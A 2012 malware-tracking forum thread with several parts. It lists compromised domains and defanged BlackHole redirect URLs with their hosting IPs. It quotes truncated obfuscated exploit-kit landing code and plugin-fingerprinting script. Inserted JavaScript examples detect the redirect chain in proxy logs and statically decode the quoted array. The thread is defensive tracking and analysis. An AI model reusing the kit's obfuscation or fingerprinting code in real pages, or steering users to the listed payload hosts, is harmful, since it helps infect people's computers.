Numerous malware drive by attempts

A place to discuss malware of every flavor, e.g. Storm, Waledac, Conficker and Zeus

Re: Numerous malware drive by attempts

Postby Red Dwarf » Mon Jun 18, 2012 9:05 pm

More of the same [80]
Code:
ftp.psimpresores.com.ar
a1caravanning.co.uk
amf.dreamhosters.com
camper.waw.pl
cd8.com.cn
cphinney.liquidarchaeology.com
en.highsure.com.cn
en.pymed.com.cn
forum.patriaefidelis.pl
gliiaci.altervista.org
itlb.com.cn
lauriethelibrarian.electrified.ca
library.fandomcafe.com
pics.pixelarium.ch
protonx.pr.funpic.de
sacidaker.com.tr
schalkewiki.sc.funpic.de
serwis.vline.pl
sprockanastacia.altervista.org
test.vesterberg.org
tmvision.com.ar
us.com.sa
web3b.sakura.ne.jp
www.abepsi.org.br
www.albanoguattiphotography.com
www.androsoftitalia.altervista.org
www.beckerundkries.de
www.bhc.co.rs
www.biathlonnachwuchs.de
www.bleugarance.fr
www.bluesclub.pl
www.bunnyschool.co.rs
www.cidademanaus.com.br
www.constructoradelbosque.com
www.cqnasx.com
www.davidcantero.fr
www.deq.state.ms.us
www.donnepercambiare.altervista.org
www.engineerable.com
www.everline.ru
www.goodway.sh.cn
www.goushoubiao.com
www.gztwzl.com
www.helpincleaning.co.uk
www.hostelnewmorning.com
www.houseoflordsla.com
www.huguet.cl
www.infrontofmycamera.com
www.jysj.net.cn
www.lipe.rs
www.lizzieannbags.co.uk
www.lyhyjt.cn
www.nordcapitalgroup.ru
www.paree.cn
www.planetearthstaffing.com
www.plusbeograd.com
www.puteviinvest.rs
www.qchzd.com
www.shdexi.com
www.shidokai.co.uk
www.sit.gov.cv
www.skagen.bz
www.stlukesforesthills.org
www.storgas.co.rs
www.sztrm.co.rs
www.therapy2000.com
www.therealmantracker.com
www.timobieber.de
www.ubefekt.pl
www.voodoolab.org
www.walkislesofscilly.co.uk
www.wdjly.com
www.webclinic.ro
www.webuymaternity.com
www.wizantiana.co.rs
www.writersinc.co
www.xialy.com
www.xiaofeima.com
www.yemio.co.uk
www.zjsfz.com
www.zkkrosno.vel.pl


Malicious Redirections de-obfuscated: monashkanasene.ru
Code:
    hxxp://monashkanasene.ru:8080/forum/showthread.php?page=5fa58bce769e5c2c
    hxxp://monashkanasene.ru:8080/forum/Half.jar


Analysis of threats:
Wepawet analysis

Hosting IPs
monashkanasene.ru has address 213.17.171.186
monashkanasene.ru has address 89.111.177.151
monashkanasene.ru has address 94.20.30.91
monashkanasene.ru has address 173.224.209.130
monashkanasene.ru has address 124.124.212.172

Name server hosting IPs
ns1.monashkanasene.ru. 62.76.188.120
ns2.monashkanasene.ru. 62.213.64.161
ns3.monashkanasene.ru. 41.66.137.155
ns4.monashkanasene.ru. 184.106.189.124
ns5.monashkanasene.ru. 50.57.43.49
ns6.monashkanasene.ru. 173.203.96.79

Status
REGISTERED, DELEGATED, UNVERIFIED
Red Dwarf
You are kiillllling-a my bizinisss!
 
Posts: 10448
Joined: Tue Jun 27, 2006 2:01 am
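The post above documents a two-stage chain (compromised site, then a landing page on port 8080 at /forum/showthread.php?page=<16 hex digits>, then a .jar from the same /forum/ path) and a domain whose A records sit in five unrelated networks. The following is an added example, not code from the thread: it matches that URL shape in proxy log lines and counts how many distinct /16 networks the `host` output spans. The proxy log lines, their field order and the client/referer hostnames are constructed for the example; the landing and jar URLs and the `host` output are the ones quoted in the post.

```javascript
// Added example (not from the thread). Flags the landing page and the .jar
// fetch of the redirect chain documented above, and measures how widely the
// landing domain's A records are spread. Sample data below is CONSTRUCTED.

// URL shape taken from the post: /forum/showthread.php?page=<16 hex>, optionally
// on a non-standard port. The 16-hex token and exact path are required.
const LANDING_RE = /^https?:\/\/([^/:?#]+)(?::(\d+))?\/forum\/showthread\.php\?page=[0-9a-f]{16}$/i;
// Second stage from the post: a .jar directly under the same /forum/ path.
const JAR_RE = /^https?:\/\/([^/:?#]+)(?::(\d+))?\/forum\/[^/?#]+\.jar$/i;

// Constructed proxy log, one line = "<epoch> <client> <method> <url> <status> <referer>".
// The referring site name is invented; the landing/jar URLs are the post's.
const SAMPLE_LOG = [
  "1340050500 10.0.0.12 GET http://www.compromised-site.example/index.html 200 -",
  "1340050501 10.0.0.12 GET http://monashkanasene.ru:8080/forum/showthread.php?page=5fa58bce769e5c2c 200 http://www.compromised-site.example/index.html",
  "1340050503 10.0.0.12 GET http://monashkanasene.ru:8080/forum/Half.jar 200 http://monashkanasene.ru:8080/forum/showthread.php?page=5fa58bce769e5c2c",
  "1340050600 10.0.0.33 GET http://forum.example.org/forum/showthread.php?page=5 200 -", // benign: short page id
];

function hostOf(url) {
  const m = /^https?:\/\/([^/:?#]+)/i.exec(url);
  return m ? m[1].toLowerCase() : null;
}

// Returns {stage, host, port} for a landing or jar URL, null otherwise.
function classify(url) {
  let m = LANDING_RE.exec(url);
  if (m) return { stage: "landing", host: m[1].toLowerCase(), port: m[2] ? Number(m[2]) : 80 };
  m = JAR_RE.exec(url);
  if (m) return { stage: "jar", host: m[1].toLowerCase(), port: m[2] ? Number(m[2]) : 80 };
  return null;
}

// Walks the log and returns one record per matching request, keeping the
// referer host so the compromised site that started the chain is visible.
function flagProxyLines(lines) {
  const hits = [];
  for (const line of lines) {
    const [ts, client, , url, , referer] = line.split(" ");
    const c = classify(url);
    if (!c) continue;
    hits.push({
      ts: Number(ts),
      client,
      stage: c.stage,
      host: c.host,
      port: c.port,
      referer: referer === "-" ? null : hostOf(referer),
    });
  }
  return hits;
}

// `host` output copied from the post. Counting distinct /16s is a cheap,
// offline stand-in for "how many unrelated networks host this name"; the
// real question is distinct ASNs, which needs a lookup this example avoids.
const HOST_OUTPUT = `monashkanasene.ru has address 213.17.171.186
monashkanasene.ru has address 89.111.177.151
monashkanasene.ru has address 94.20.30.91
monashkanasene.ru has address 173.224.209.130
monashkanasene.ru has address 124.124.212.172`;

function distinctSlash16(hostOutput) {
  const nets = new Set();
  for (const m of hostOutput.matchAll(/has address (\d+)\.(\d+)\.\d+\.\d+/g)) {
    nets.add(`${m[1]}.${m[2]}`);
  }
  return nets.size;
}
```

Run on the constructed log, the benign fourth line is not flagged because its page id is not a 16-hex token, and the two hits carry the referring host so the chain from the compromised site can be reconstructed. The /16 count for the quoted `host` output is 5 out of 5 records, which is the spread the post is pointing at.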

Re: Numerous malware drive by attempts

Postby Red Dwarf » Mon Jun 18, 2012 11:29 pm



CERT-GIB wrote:
CERT-GIB Incident Response Team <response@cert-gib.ru>, 12:26 AM (14 hours ago):

Good day.

We have notified the registrar and waiting for response.

--
Best regards,
Gonebnyy Albert
CERT-GIB
+7 (495) 988-00-40
response@cert-gib.ru
http://www.cert-gib.ru/

--

SUMATRANAJUGE.RU
REGISTERED, NOT DELEGATED, UNVERIFIED

Re: Numerous malware drive by attempts

Postby NotBuyingIt » Fri Sep 14, 2012 10:37 pm

Red Dwarf wrote:Live site payload:
Code:
<h1><b>Please Wait... Loading...</h1></b>

<script>try{q=document.createElement("p");q.appendChild(q+"");}catch(qw){h=-012/5;f="from";try{bcsd=prototype-2;}catch(bawg){ss=[];f+=(h&&f)?("CharC"+"ode"):"";
e=window["eval"];n=[9,18,315,408,32,80,300,444,99,234,327,404,110,232,138,412,101,232,207,432,101,218,303,440,116,230,198,484,84,194,309,312,97,218,303,160,39,
[~ snip ~]


The exploit(s) which I've been following have adopted a new edition of the BlackHole exploit kit, according to Steven Burn (his remark on a WOT forum). The encrypted data that JavaScript uses to render a "payload" site's webpage on the fly has been moved from the script's text into a PRE tag, but the result is familiar:

Code:
try{var PluginDetect={version:"0.7.8",name:"PluginDetect",handler:function(c,b,a){return function(){c(b,a)}},isDefined:function(b){return typeof b!="undefined"},isArray:function(b){return(/array/i).test(Object.prototype.toString.call(b))},isFunc:function(b){return typeof b=="function"},isString:function(b){return typeof b=="string"},isNum:function(b){return typeof b=="number"},isStrNum:function(b){return(typeof b=="string"&&(/\d/).test(b))},getNumRegx:/[\d][\d\.\_,-]*/,splitNumRegx:/[\.\_,-]/g,getNum:function(b,c){var d=this,a=d.isStrNum(b)?(d.isDefined(c)?new RegExp(c):d.getNumRegx).exec(b):null;return a?a[0]:null},compareNums:function(h,f,d){var e=this,c,b,a,g=parseInt;if(e.isStrNum(h)&&e.isStrNum(f)){if(e.isDefined(d)&&d.compareNums){return d.compareNums(h,f)}c=h.split(e.splitNumRegx);b=f.split(e.splitNumRegx);for(a=0;ag(b[a],10)){return 1}if(g(c[a],10)c||!(/\d/).test(e[a])){e[a]="0"}}return e.slice(0,4).join(",")},$$hasMimeType:function(a){return function(c){if(!a.isIE&&c){var f,e,b,d=a.isArray(c)?c:(a.isString(c)?[c]:[]);for(b=0;b2||!f||!f.version||!(e=h.getNum(f.version))){return b}if(!b){return e}e=h.formatNum(e);b=h.formatNum(b);d=b.split(h.splitNumRegx);g=e.split(h.splitNumRegx);for(a=0;a-1&&a>c&&d[a]!="0"){return b}if(g[a]!=d[a]){if(c==-1){c=a}if(d[a]!="0"){return b}}}return e},AXO:window.ActiveXObject,getAXO:function(a){var f=null,d,b=this,c={};try{f=new b.AXO(a)}catch(d){}return f},convertFuncs:function(f){var a,g,d,b=/^[\$][\$]/,c=this;for(a in f){if(b.test(a)){try{g=a.slice(2);if(g.length>0&&!f[g]){f[g]=f[a](f);delete f[a]}}catch(d){}}}},initObj:function(e,b,d){var a,c;if(e){if(e[b[0]]==1||d){for(a=0;a=0;f=f-2){if(d[f]&&new RegExp(d[f],"i").test(b)){c.OS=d[f+1];break}}}c.convertFuncs(c);c.head=(document.getElementsByTagName("head")[0]||document.getElementsByTagName("body")[0]||document.body||null);c.isIE=(new Function("return 
"+e+"*@cc_on!@*"+e+"false"))();c.verIE=c.isIE&&(/MSIE\s*(\d+\.?\d*)/i).test(i)?parseFloat(RegExp.$1,10):null;c.ActiveXEnabled=false;if(c.isIE){var f,j=["Msxml2.XMLHTTP","Msxml2.DOMDocument","Microsoft.XMLDOM","ShockwaveFlash.ShockwaveFlash","TDCCtl.TDCCtl","Shell.UIHelper","Scripting.Dictionary","wmplayer.ocx"];for(f=0;f0&&c.isFunc(b[0])))){a.push(b)}},
[~ snip ~]

The payload sites that I've noticed over the past several months use IP addresses in lieu of domain names and are mostly hosted in the USA. Several new payload sites are sometimes introduced within the same day. The sites' webserver claims to be "nginx/0.7.67" and will reply with bogus HTTP errors to requests from many IP addresses known to be used by virus-hunters, probably including Wepawet and urlQuery. In addition to the rather dated collection of malware, the kit recently added a new exploit for a Java vulnerability (CVE-2012-4681) which may not yet be patched on many computers.
NotBuyingIt
Spammer Killing Machine
 
Posts: 609
Joined: Sun Jun 13, 2010 5:22 pm
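The obfuscated script quoted at the top of the post above can be decoded statically, without running it. The following is an added example, not code from the thread or from the kit: it reproduces the wrapper's indirect construction of `eval`/`fromCharCode` and decodes the visible part of the number array. The array values are copied from the post up to the snip. The divisor rule (element i divided by (i % 4) + 1) is an assumption inferred from the visible values; the real decode loop sits in the snipped part of the script, so only the prefix is verified here.

```javascript
// Added example (not from the thread). Static de-obfuscation of the visible
// prefix of the BlackHole landing-page script quoted above.

// Number array copied from the post, up to "[~ snip ~]".
const N = [9,18,315,408,32,80,300,444,99,234,327,404,110,232,138,412,101,232,207,432,
           101,218,303,440,116,230,198,484,84,194,309,312,97,218,303,160,39];

// The wrapper avoids the literals "eval" and "fromCharCode" in its body:
//   h = -012/5            012 is a legacy OCTAL literal (decimal 10), so h === -2
//   f = "from"; f += (h && f) ? ("CharC" + "ode") : ""   -> "fromCharCode"
//   e = window["eval"]    eval reached by property lookup, then e(decoded)
function wrapperH() {
  // parseInt("012", 8) gives the value the octal literal in the script yields
  return -parseInt("012", 8) / 5;
}

function wrapperF() {
  let f = "from";
  const h = wrapperH();
  f += (h && f) ? ("CharC" + "ode") : ""; // h (-2) and f are both truthy
  return f; // "fromCharCode"
}

// ASSUMPTION: divisor cycles 1,2,3,4 by index. Every visible element divides
// cleanly under this rule and yields printable ASCII; anything else throws so
// a wrong guess on a different sample fails loudly instead of silently.
function decodeBlackholeArray(arr) {
  const f = wrapperF();
  let out = "";
  for (let i = 0; i < arr.length; i++) {
    const d = (i % 4) + 1;
    const code = arr[i] / d;
    if (!Number.isInteger(code) || code < 9 || code > 126) {
      throw new Error(`element ${i} (${arr[i]}) is not clean ASCII under divisor ${d}`);
    }
    out += String[f](code); // String.fromCharCode reached through the built name
  }
  return out;
}

// Execution gate in the wrapper: q.appendChild(q + "") passes a string where a
// Node is required, which throws in a real DOM, so the decoder lives in the
// catch block. An emulator whose appendChild silently accepts anything never
// reaches it. Simulated here with a caller-supplied appendChild.
function runsOnlyWhenDomThrows(domAppendChild) {
  try {
    domAppendChild("[object HTMLParagraphElement]"); // what q + "" evaluates to
    return false; // no exception: decoder is skipped
  } catch (qw) {
    return true;  // exception: catch block runs the decoder
  }
}
```

Decoding N gives two tabs followed by `if (document.getElementsByTagName('`, which is where the visible data ends; the inner `try{bcsd=prototype-2;}catch(bawg){...}` is a second gate of the same kind, since `prototype` is an undefined name and the subtraction throws a ReferenceError. Feeding the decoded string to a logging function instead of `window["eval"]` is the usual way to recover the full iframe or document.write that follows.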

Re: Numerous malware drive by attempts

Postby spamislame » Mon Sep 17, 2012 9:46 am

You should be aware that these are 99.999% of the time hijacked, abandoned websites. They aren't owned or registered by any of the scumbags who set these attacks up.

Per day, at least 800 - 900 new domains are taken over to present these malware sites. That's a direct stat from both law enforcement and the ongoing monitoring by several trackers of Zeus-related spam.

I still report any of the domains I see in my inbound spam, but it's like grabbing a cup of water from the ocean.

I think the past three years have seen a huge increase in the abuse of old abandoned web servers, very often hosted by companies who are completely unresponsive to any abuse requests. And it's not just for malware like this. It's anything. Pharmacy spam, porn, you name it.

SiL
spamislame
Site Admin
 
Posts: 5056
Joined: Tue May 09, 2006 9:18 am

Re: Numerous malware drive by attempts

Postby NotBuyingIt » Tue Sep 18, 2012 7:20 am

spamislame wrote:but it's like grabbing a cup of water from the ocean.
Although I should guess that the scale is much closer to grabbing a cup of water from a mellow pond, I appreciate the saliency of your point. :)

Re: Numerous malware drive by attempts

Postby Red Dwarf » Tue Sep 18, 2012 4:44 pm

spamislame wrote:You should be aware that these are 99.999% of the time hijacked, abandoned websites. They aren't owned or registered by any of the scumbags who set these attacks up.
..
I still report any of the domains I see in my inbound spam, but it's like grabbing a cup of water from the ocean.



For the few that are not abandoned, getting the domain black/red-listed in WOT and Site Advisor sure gains their attention, and they patch up the security hole, or at least remove the harmful web pages.
For the remaining 99.99%, getting the domain black/red-listed in WOT and Site Advisor renders the scam less effective.

Re: Numerous malware drive by attempts

Postby NotBuyingIt » Wed Sep 19, 2012 6:15 pm

Red Dwarf wrote:For the remaining 99.99% getting the domain black/red-listed in WOT and Site Advisor renders the scam less effective.

In addition to planting keyloggers and such, I suspect the particular BlackHole exploit which my WOT thread has been following attempts to secretly recruit its victims' computers into a botnet. (The same "kit" is also used by other groups not followed in my thread.) I have read somewhere that the mischief is mostly accomplished within the first few hours after launching the scam webpages. I have also read that the biggest spammers use a botnet of ten thousand or even twenty thousand zombie computers. My intention has been to raise the alarm on WOT a few hours earlier than WOT's automation would add warnings from its trusted sources. (My cup runneth over.)

Until recently, the exploit used old malware, which is widely detected by most antivirus services, to exploit old vulnerabilities for which patches have been available for a year or two. Only the most neglectful, inept and bewildered (NIB) computer users should have risked infection under these circumstances, perhaps people who are the least likely to install WOT. Now, however, a new Java exploit (as previously noted) has been added and the BlackHole exploit kit has been revised to be more elusive in some ways. The pressure to revise may have come from a diminishing number of still uninfected computers operated by those NIB-lets. I've planned to curtail much of my effort at my thread's six months point in a few days. I think that the thread archives enough malicious URLs to illustrate how treacherous that exploit kit has become.

Re: Numerous malware drive by attempts

Postby Red Dwarf » Thu Sep 20, 2012 3:34 pm

Sorry, I have been neglecting those, and WOT in general - too busy doing scam busting.

I posted a fresh 50 from the past week at
http://www.mywot.com/en/forum/21464-qai ... ent-163762

They were all in the form /********/index.html
